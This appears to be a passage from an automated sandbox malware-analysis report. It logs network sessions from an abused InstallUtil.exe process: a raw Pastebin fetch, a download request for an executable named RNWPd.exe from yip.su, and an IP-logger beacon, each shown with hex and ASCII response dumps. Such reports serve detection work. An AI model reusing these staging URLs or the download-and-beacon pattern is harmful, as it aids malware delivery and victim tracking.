0a 09 09 09
                          Data Ascii: eight:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain">
                          2024-09-12 20:01:25 UTC166INData Raw: 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: m()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:01:25 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.849719172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:30 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:01:30 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227d63da2842dd-EWR
                          2024-09-12 20:01:30 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:01:30 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:01:30 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:01:30 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:01:30 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.849720188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:30 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:01:31 UTC906INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:01:30 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:01:30 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkjQbJYXqOmrRRmZznoSjB%2FNg8K83vhS2aHOU%2BRhWTC%2B%2F8XYBG793c86V6ahiBZIZ%2FWlKx4o8YW8QUe5DwxpLRFBso4rAvLF8F%2BJq7IJO4NbxDP4plLXuA4%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227d6808d60c92-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:01:31 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:01:31 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                          Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                          2024-09-12 20:01:31 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                          Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                          2024-09-12 20:01:31 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                          Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                          2024-09-12 20:01:31 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                          Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                          2024-09-12 20:01:31 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                          Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                          2024-09-12 20:01:31 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:01:31 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.849721104.21.76.574436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:35 UTC68OUTGET /1djqU4 HTTP/1.1
                          Host: iplogger.com
                          Connection: Keep-Alive
                          2024-09-12 20:01:35 UTC1285INHTTP/1.1 403 Forbidden
                          Date: Thu, 12 Sep 2024 20:01:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                          Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                          Cross-Origin-Embedder-Policy: require-corp
                          Cross-Origin-Opener-Policy: same-origin
                          Cross-Origin-Resource-Policy: same-origin
                          Origin-Agent-Cluster: ?1
                          Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                          Referrer-Policy: same-origin
                          X-Content-Options: nosniff
                          X-Frame-Options: SAMEORIGIN
                          cf-mitigated: challenge
                          2024-09-12 20:01:35 UTC693INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 48 75 57 56 7a 53 7a 4f 35 43 69 62 6f 58 59 64 6d 4c 58 77 4e 71 47 4e 67 4c 77 6b 64 48 53 41 70 51 35 70 47 52 4c 52 6b 34 59 4c 5a 76 54 4d 75 67 32 52 45 6f 58 45 4d 46 56 61 58 69 65 36 4c 78 42 7a 68 56 41 63 6a 6a 37 45 55 79 45 45 33 2f 51 67 76 6e 69 72 74 33 77 6b 70 6c 35 47 76 59 46 46 57 35 72 56 52 76 41 3d 24 39 38 4f 45 55 48 49 78 46 65 56 64 54 35 67 75 32 50 4d 52 35 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                          Data Ascii: cf-chl-out: HuWVzSzO5CiboXYdmLXwNqGNgLwkdHSApQ5pGRLRk4YLZvTMug2REoXEMFVaXie6LxBzhVAcjj7EUyEE3/Qgvnirt3wkpl5GvYFFW5rVRvA=$98OEUHIxFeVdT5gu2PMR5Q==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                          2024-09-12 20:01:35 UTC1369INData Raw: 34 30 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                          Data Ascii: 409a<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                          2024-09-12 20:01:35 UTC1369INData Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67
                          Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
                          2024-09-12 20:01:35 UTC1369INData Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d
                          Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
                          2024-09-12 20:01:35 UTC1369INData Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68
                          Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
